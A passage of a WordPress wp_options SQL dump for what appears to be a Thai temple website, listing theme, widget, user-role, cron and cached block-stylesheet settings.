(39,'recently_edited','a:3:{i:0;s:93:\"/var/www/w037/html/wp-content/plugins/advanced-google-recaptcha/advanced-google-recaptcha.php\";i:1;s:95:\"/var/www/web054/html/wp-content/plugins/advanced-google-recaptcha/advanced-google-recaptcha.php\";i:2;s:0:\"\";}','no'),
(40,'template','plant','yes'),
(41,'stylesheet','plant','yes'),
(42,'comment_registration','0','yes'),
(43,'html_type','text/html','yes'),
(44,'use_trackback','0','yes'),
(45,'default_role','subscriber','yes'),
(46,'db_version','60717','yes'),
(47,'uploads_use_yearmonth_folders','1','yes'),
(48,'upload_path','','yes'),
(49,'blog_public','1','yes'),
(50,'default_link_category','2','yes'),
(51,'show_on_front','page','yes'),
(52,'tag_base','','yes'),
(53,'show_avatars','1','yes'),
(54,'avatar_rating','G','yes'),
(55,'upload_url_path','','yes'),
(56,'thumbnail_size_w','150','yes'),
(57,'thumbnail_size_h','150','yes'),
(58,'thumbnail_crop','1','yes'),
(59,'medium_size_w','300','yes'),
(60,'medium_size_h','300','yes'),
(61,'avatar_default','mystery','yes'),
(62,'large_size_w','1024','yes'),
(63,'large_size_h','1024','yes'),
(64,'image_default_link_type','none','yes'),
(65,'image_default_size','','yes'),
(66,'image_default_align','','yes'),
(67,'close_comments_for_old_posts','0','yes'),
(68,'close_comments_days_old','14','yes'),
(69,'thread_comments','1','yes'),
(70,'thread_comments_depth','5','yes'),
(71,'page_comments','0','yes'),
(72,'comments_per_page','50','yes'),
(73,'default_comments_page','newest','yes'),
(74,'comment_order','asc','yes'),
(75,'sticky_posts','a:0:{}','yes'),
(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(79,'uninstall_plugins','a:1:{s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";a:2:{i:0;s:15:\"WPCaptcha_Setup\";i:1;s:9:\"uninstall\";}}','no'),
(80,'timezone_string','','yes'),
(81,'page_for_posts','0','yes'),
(82,'page_on_front','19','yes'),
(83,'default_post_format','0','yes'),
(84,'link_manager_enabled','0','yes'),
(85,'finished_splitting_shared_terms','1','yes'),
(86,'site_icon','13','on'),
(87,'medium_large_size_w','768','yes'),
(88,'medium_large_size_h','0','yes'),
(89,'wp_page_for_privacy_policy','3','yes'),
(90,'show_comments_cookies_opt_in','1','yes'),
(91,'admin_email_lifespan','1763262091','yes'),
(92,'disallowed_keys','','no'),
(93,'comment_previously_approved','1','yes'),
(94,'auto_plugin_theme_update_emails','a:0:{}','no'),
(95,'auto_update_core_dev','enabled','yes'),
(96,'auto_update_core_minor','enabled','yes'),
(97,'auto_update_core_major','enabled','yes'),
(98,'wp_force_deactivated_plugins','a:0:{}','off'),
(99,'wp_attachment_pages_enabled','0','yes'),
(100,'initial_db_version','57155','yes'),
(101,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:82:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:19:\"view_koko_analytics\";b:1;s:21:\"manage_koko_analytics\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),
(102,'fresh_site','0','off'),
(103,'WPLANG','th','yes'),
(104,'user_count','2','off'),
(105,'widget_block','a:8:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:178:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>เรื่องล่าสุด</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:254:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>ความเห็นล่าสุด</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:162:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>คลังเก็บ</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:164:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>หมวดหมู่</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;i:9;a:1:{s:7:\"content\";s:448:\"<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":773,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/582270586_122256729548202781_1342293203871796833_n-2-1024x379.jpg\" alt=\"\" class=\"wp-image-773\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\";}i:11;a:1:{s:7:\"content\";s:146:\"<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"></figure>\n<!-- /wp:gallery -->\";}}','on'),
(106,'sidebars_widgets','a:14:{s:19:\"wp_inactive_widgets\";a:0:{}s:8:\"rightbar\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:7:\"leftbar\";a:0:{}s:7:\"shopbar\";a:0:{}s:11:\"home_banner\";a:0:{}s:6:\"search\";a:0:{}s:6:\"action\";a:1:{i:0;s:7:\"block-9\";}s:10:\"mobile_nav\";a:0:{}s:13:\"footer_blocks\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:13:\"array_version\";i:3;}','on'),
(107,'cron','a:10:{i:1775222738;a:1:{s:35:\"koko_analytics_test_custom_endpoint\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1775222838;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1775222839;a:4:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1775222866;a:3:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1775222869;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1775223675;a:1:{s:20:\"sgpbGetNotifications\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1775305605;a:1:{s:25:\"koko_analytics_prune_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1775309371;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1775395638;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','on'),
(108,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(109,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(110,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(111,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(112,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(113,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(114,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(115,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(116,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(117,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(118,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(119,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(120,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(121,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(122,'_transient_wp_core_block_css_files','a:2:{s:7:\"version\";s:5:\"6.9.4\";s:5:\"files\";a:584:{i:0;s:31:\"accordion-heading/style-rtl.css\";i:1;s:35:\"accordion-heading/style-rtl.min.css\";i:2;s:27:\"accordion-heading/style.css\";i:3;s:31:\"accordion-heading/style.min.css\";i:4;s:28:\"accordion-item/style-rtl.css\";i:5;s:32:\"accordion-item/style-rtl.min.css\";i:6;s:24:\"accordion-item/style.css\";i:7;s:28:\"accordion-item/style.min.css\";i:8;s:29:\"accordion-panel/style-rtl.css\";i:9;s:33:\"accordion-panel/style-rtl.min.css\";i:10;s:25:\"accordion-panel/style.css\";i:11;s:29:\"accordion-panel/style.min.css\";i:12;s:23:\"accordion/style-rtl.css\";i:13;s:27:\"accordion/style-rtl.min.css\";i:14;s:19:\"accordion/style.css\";i:15;s:23:\"accordion/style.min.css\";i:16;s:23:\"archives/editor-rtl.css\";i:17;s:27:\"archives/editor-rtl.min.css\";i:18;s:19:\"archives/editor.css\";i:19;s:23:\"archives/editor.min.css\";i:20;s:22:\"archives/style-rtl.css\";i:21;s:26:\"archives/style-rtl.min.css\";i:22;s:18:\"archives/style.css\";i:23;s:22:\"archives/style.min.css\";i:24;s:20:\"audio/editor-rtl.css\";i:25;s:24:\"audio/editor-rtl.min.css\";i:26;s:16:\"audio/editor.css\";i:27;s:20:\"audio/editor.min.css\";i:28;s:19:\"audio/style-rtl.css\";i:29;s:23:\"audio/style-rtl.min.css\";i:30;s:15:\"audio/style.css\";i:31;s:19:\"audio/style.min.css\";i:32;s:19:\"audio/theme-rtl.css\";i:33;s:23:\"audio/theme-rtl.min.css\";i:34;s:15:\"audio/theme.css\";i:35;s:19:\"audio/theme.min.css\";i:36;s:21:\"avatar/editor-rtl.css\";i:37;s:25:\"avatar/editor-rtl.min.css\";i:38;s:17:\"avatar/editor.css\";i:39;s:21:\"avatar/editor.min.css\";i:40;s:20:\"avatar/style-rtl.css\";i:41;s:24:\"avatar/style-rtl.min.css\";i:42;s:16:\"avatar/style.css\";i:43;s:20:\"avatar/style.min.css\";i:44;s:21:\"button/editor-rtl.css\";i:45;s:25:\"button/editor-rtl.min.css\";i:46;s:17:\"button/editor.css\";i:47;s:21:\"button/editor.min.css\";i:48;s:20:\"button/style-rtl.css\";i:49;s:24:\"button/style-rtl.min.css\";i:50;s:16:\"button/style.css\";i:51;s:20:\"button/style.min.css\";i:52;s:22:\"buttons/editor-rtl.css\";i:53;s:26:\"buttons/editor-rtl.min.css\";i:54;s:18:\"buttons/editor.css\";i:55;s:22:\"buttons/editor.min.css\";i:56;s:21:\"buttons/style-rtl.css\";i:57;s:25:\"buttons/style-rtl.min.css\";i:58;s:17:\"buttons/style.css\";i:59;s:21:\"buttons/style.min.css\";i:60;s:22:\"calendar/style-rtl.css\";i:61;s:26:\"calendar/style-rtl.min.css\";i:62;s:18:\"calendar/style.css\";i:63;s:22:\"calendar/style.min.css\";i:64;s:25:\"categories/editor-rtl.css\";i:65;s:29:\"categories/editor-rtl.min.css\";i:66;s:21:\"categories/editor.css\";i:67;s:25:\"categories/editor.min.css\";i:68;s:24:\"categories/style-rtl.css\";i:69;s:28:\"categories/style-rtl.min.css\";i:70;s:20:\"categories/style.css\";i:71;s:24:\"categories/style.min.css\";i:72;s:19:\"code/editor-rtl.css\";i:73;s:23:\"code/editor-rtl.min.css\";i:74;s:15:\"code/editor.css\";i:75;s:19:\"code/editor.min.css\";i:76;s:18:\"code/style-rtl.css\";i:77;s:22:\"code/style-rtl.min.css\";i:78;s:14:\"code/style.css\";i:79;s:18:\"code/style.min.css\";i:80;s:18:\"code/theme-rtl.css\";i:81;s:22:\"code/theme-rtl.min.css\";i:82;s:14:\"code/theme.css\";i:83;s:18:\"code/theme.min.css\";i:84;s:22:\"columns/editor-rtl.css\";i:85;s:26:\"columns/editor-rtl.min.css\";i:86;s:18:\"columns/editor.css\";i:87;s:22:\"columns/editor.min.css\";i:88;s:21:\"columns/style-rtl.css\";i:89;s:25:\"columns/style-rtl.min.css\";i:90;s:17:\"columns/style.css\";i:91;s:21:\"columns/style.min.css\";i:92;s:33:\"comment-author-name/style-rtl.css\";i:93;s:37:\"comment-author-name/style-rtl.min.css\";i:94;s:29:\"comment-author-name/style.css\";i:95;s:33:\"comment-author-name/style.min.css\";i:96;s:29:\"comment-content/style-rtl.css\";i:97;s:33:\"comment-content/style-rtl.min.css\";i:98;s:25:\"comment-content/style.css\";i:99;s:29:\"comment-content/style.min.css\";i:100;s:26:\"comment-date/style-rtl.css\";i:101;s:30:\"comment-date/style-rtl.min.css\";i:102;s:22:\"comment-date/style.css\";i:103;s:26:\"comment-date/style.min.css\";i:104;s:31:\"comment-edit-link/style-rtl.css\";i:105;s:35:\"comment-edit-link/style-rtl.min.css\";i:106;s:27:\"comment-edit-link/style.css\";i:107;s:31:\"comment-edit-link/style.min.css\";i:108;s:32:\"comment-reply-link/style-rtl.css\";i:109;s:36:\"comment-reply-link/style-rtl.min.css\";i:110;s:28:\"comment-reply-link/style.css\";i:111;s:32:\"comment-reply-link/style.min.css\";i:112;s:30:\"comment-template/style-rtl.css\";i:113;s:34:\"comment-template/style-rtl.min.css\";i:114;s:26:\"comment-template/style.css\";i:115;s:30:\"comment-template/style.min.css\";i:116;s:42:\"comments-pagination-numbers/editor-rtl.css\";i:117;s:46:\"comments-pagination-numbers/editor-rtl.min.css\";i:118;s:38:\"comments-pagination-numbers/editor.css\";i:119;s:42:\"comments-pagination-numbers/editor.min.css\";i:120;s:34:\"comments-pagination/editor-rtl.css\";i:121;s:38:\"comments-pagination/editor-rtl.min.css\";i:122;s:30:\"comments-pagination/editor.css\";i:123;s:34:\"comments-pagination/editor.min.css\";i:124;s:33:\"comments-pagination/style-rtl.css\";i:125;s:37:\"comments-pagination/style-rtl.min.css\";i:126;s:29:\"comments-pagination/style.css\";i:127;s:33:\"comments-pagination/style.min.css\";i:128;s:29:\"comments-title/editor-rtl.css\";i:129;s:33:\"comments-title/editor-rtl.min.css\";i:130;s:25:\"comments-title/editor.css\";i:131;s:29:\"comments-title/editor.min.css\";i:132;s:23:\"comments/editor-rtl.css\";i:133;s:27:\"comments/editor-rtl.min.css\";i:134;s:19:\"comments/editor.css\";i:135;s:23:\"comments/editor.min.css\";i:136;s:22:\"comments/style-rtl.css\";i:137;s:26:\"comments/style-rtl.min.css\";i:138;s:18:\"comments/style.css\";i:139;s:22:\"comments/style.min.css\";i:140;s:20:\"cover/editor-rtl.css\";i:141;s:24:\"cover/editor-rtl.min.css\";i:142;s:16:\"cover/editor.css\";i:143;s:20:\"cover/editor.min.css\";i:144;s:19:\"cover/style-rtl.css\";i:145;s:23:\"cover/style-rtl.min.css\";i:146;s:15:\"cover/style.css\";i:147;s:19:\"cover/style.min.css\";i:148;s:22:\"details/editor-rtl.css\";i:149;s:26:\"details/editor-rtl.min.css\";i:150;s:18:\"details/editor.css\";i:151;s:22:\"details/editor.min.css\";i:152;s:21:\"details/style-rtl.css\";i:153;s:25:\"details/style-rtl.min.css\";i:154;s:17:\"details/style.css\";i:155;s:21:\"details/style.min.css\";i:156;s:20:\"embed/editor-rtl.css\";i:157;s:24:\"embed/editor-rtl.min.css\";i:158;s:16:\"embed/editor.css\";i:159;s:20:\"embed/editor.min.css\";i:160;s:19:\"embed/style-rtl.css\";i:161;s:23:\"embed/style-rtl.min.css\";i:162;s:15:\"embed/style.css\";i:163;s:19:\"embed/style.min.css\";i:164;s:19:\"embed/theme-rtl.css\";i:165;s:23:\"embed/theme-rtl.min.css\";i:166;s:15:\"embed/theme.css\";i:167;s:19:\"embed/theme.min.css\";i:168;s:19:\"file/editor-rtl.css\";i:169;s:23:\"file/editor-rtl.min.css\";i:170;s:15:\"file/editor.css\";i:171;s:19:\"file/editor.min.css\";i:172;s:18:\"file/style-rtl.css\";i:173;s:22:\"file/style-rtl.min.css\";i:174;s:14:\"file/style.css\";i:175;s:18:\"file/style.min.css\";i:176;s:23:\"footnotes/style-rtl.css\";i:177;s:27:\"footnotes/style-rtl.min.css\";i:178;s:19:\"footnotes/style.css\";i:179;s:23:\"footnotes/style.min.css\";i:180;s:23:\"freeform/editor-rtl.css\";i:181;s:27:\"freeform/editor-rtl.min.css\";i:182;s:19:\"freeform/editor.css\";i:183;s:23:\"freeform/editor.min.css\";i:184;s:22:\"gallery/editor-rtl.css\";i:185;s:26:\"gallery/editor-rtl.min.css\";i:186;s:18:\"gallery/editor.css\";i:187;s:22:\"gallery/editor.min.css\";i:188;s:21:\"gallery/style-rtl.css\";i:189;s:25:\"gallery/style-rtl.min.css\";i:190;s:17:\"gallery/style.css\";i:191;s:21:\"gallery/style.min.css\";i:192;s:21:\"gallery/theme-rtl.css\";i:193;s:25:\"gallery/theme-rtl.min.css\";i:194;s:17:\"gallery/theme.css\";i:195;s:21:\"gallery/theme.min.css\";i:196;s:20:\"group/editor-rtl.css\";i:197;s:24:\"group/editor-rtl.min.css\";i:198;s:16:\"group/editor.css\";i:199;s:20:\"group/editor.min.css\";i:200;s:19:\"group/style-rtl.css\";i:201;s:23:\"group/style-rtl.min.css\";i:202;s:15:\"group/style.css\";i:203;s:19:\"group/style.min.css\";i:204;s:19:\"group/theme-rtl.css\";i:205;s:23:\"group/theme-rtl.min.css\";i:206;s:15:\"group/theme.css\";i:207;s:19:\"group/theme.min.css\";i:208;s:21:\"heading/style-rtl.css\";i:209;s:25:\"heading/style-rtl.min.css\";i:210;s:17:\"heading/style.css\";i:211;s:21:\"heading/style.min.css\";i:212;s:19:\"html/editor-rtl.css\";i:213;s:23:\"html/editor-rtl.min.css\";i:214;s:15:\"html/editor.css\";i:215;s:19:\"html/editor.min.css\";i:216;s:20:\"image/editor-rtl.css\";i:217;s:24:\"image/editor-rtl.min.css\";i:218;s:16:\"image/editor.css\";i:219;s:20:\"image/editor.min.css\";i:220;s:19:\"image/style-rtl.css\";i:221;s:23:\"image/style-rtl.min.css\";i:222;s:15:\"image/style.css\";i:223;s:19:\"image/style.min.css\";i:224;s:19:\"image/theme-rtl.css\";i:225;s:23:\"image/theme-rtl.min.css\";i:226;s:15:\"image/theme.css\";i:227;s:19:\"image/theme.min.css\";i:228;s:29:\"latest-comments/style-rtl.css\";i:229;s:33:\"latest-comments/style-rtl.min.css\";i:230;s:25:\"latest-comments/style.css\";i:231;s:29:\"latest-comments/style.min.css\";i:232;s:27:\"latest-posts/editor-rtl.css\";i:233;s:31:\"latest-posts/editor-rtl.min.css\";i:234;s:23:\"latest-posts/editor.css\";i:235;s:27:\"latest-posts/editor.min.css\";i:236;s:26:\"latest-posts/style-rtl.css\";i:237;s:30:\"latest-posts/style-rtl.min.css\";i:238;s:22:\"latest-posts/style.css\";i:239;s:26:\"latest-posts/style.min.css\";i:240;s:18:\"list/style-rtl.css\";i:241;s:22:\"list/style-rtl.min.css\";i:242;s:14:\"list/style.css\";i:243;s:18:\"list/style.min.css\";i:244;s:22:\"loginout/style-rtl.css\";i:245;s:26:\"loginout/style-rtl.min.css\";i:246;s:18:\"loginout/style.css\";i:247;s:22:\"loginout/style.min.css\";i:248;s:19:\"math/editor-rtl.css\";i:249;s:23:\"math/editor-rtl.min.css\";i:250;s:15:\"math/editor.css\";i:251;s:19:\"math/editor.min.css\";i:252;s:18:\"math/style-rtl.css\";i:253;s:22:\"math/style-rtl.min.css\";i:254;s:14:\"math/style.css\";i:255;s:18:\"math/style.min.css\";i:256;s:25:\"media-text/editor-rtl.css\";i:257;s:29:\"media-text/editor-rtl.min.css\";i:258;s:21:\"media-text/editor.css\";i:259;s:25:\"media-text/editor.min.css\";i:260;s:24:\"media-text/style-rtl.css\";i:261;s:28:\"media-text/style-rtl.min.css\";i:262;s:20:\"media-text/style.css\";i:263;s:24:\"media-text/style.min.css\";i:264;s:19:\"more/editor-rtl.css\";i:265;s:23:\"more/editor-rtl.min.css\";i:266;s:15:\"more/editor.css\";i:267;s:19:\"more/editor.min.css\";i:268;s:30:\"navigation-link/editor-rtl.css\";i:269;s:34:\"navigation-link/editor-rtl.min.css\";i:270;s:26:\"navigation-link/editor.css\";i:271;s:30:\"navigation-link/editor.min.css\";i:272;s:29:\"navigation-link/style-rtl.css\";i:273;s:33:\"navigation-link/style-rtl.min.css\";i:274;s:25:\"navigation-link/style.css\";i:275;s:29:\"navigation-link/style.min.css\";i:276;s:33:\"navigation-submenu/editor-rtl.css\";i:277;s:37:\"navigation-submenu/editor-rtl.min.css\";i:278;s:29:\"navigation-submenu/editor.css\";i:279;s:33:\"navigation-submenu/editor.min.css\";i:280;s:25:\"navigation/editor-rtl.css\";i:281;s:29:\"navigation/editor-rtl.min.css\";i:282;s:21:\"navigation/editor.css\";i:283;s:25:\"navigation/editor.min.css\";i:284;s:24:\"navigation/style-rtl.css\";i:285;s:28:\"navigation/style-rtl.min.css\";i:286;s:20:\"navigation/style.css\";i:287;s:24:\"navigation/style.min.css\";i:288;s:23:\"nextpage/editor-rtl.css\";i:289;s:27:\"nextpage/editor-rtl.min.css\";i:290;s:19:\"nextpage/editor.css\";i:291;s:23:\"nextpage/editor.min.css\";i:292;s:24:\"page-list/editor-rtl.css\";i:293;s:28:\"page-list/editor-rtl.min.css\";i:294;s:20:\"page-list/editor.css\";i:295;s:24:\"page-list/editor.min.css\";i:296;s:23:\"page-list/style-rtl.css\";i:297;s:27:\"page-list/style-rtl.min.css\";i:298;s:19:\"page-list/style.css\";i:299;s:23:\"page-list/style.min.css\";i:300;s:24:\"paragraph/editor-rtl.css\";i:301;s:28:\"paragraph/editor-rtl.min.css\";i:302;s:20:\"paragraph/editor.css\";i:303;s:24:\"paragraph/editor.min.css\";i:304;s:23:\"paragraph/style-rtl.css\";i:305;s:27:\"paragraph/style-rtl.min.css\";i:306;s:19:\"paragraph/style.css\";i:307;s:23:\"paragraph/style.min.css\";i:308;s:35:\"post-author-biography/style-rtl.css\";i:309;s:39:\"post-author-biography/style-rtl.min.css\";i:310;s:31:\"post-author-biography/style.css\";i:311;s:35:\"post-author-biography/style.min.css\";i:312;s:30:\"post-author-name/style-rtl.css\";i:313;s:34:\"post-author-name/style-rtl.min.css\";i:314;s:26:\"post-author-name/style.css\";i:315;s:30:\"post-author-name/style.min.css\";i:316;s:25:\"post-author/style-rtl.css\";i:317;s:29:\"post-author/style-rtl.min.css\";i:318;s:21:\"post-author/style.css\";i:319;s:25:\"post-author/style.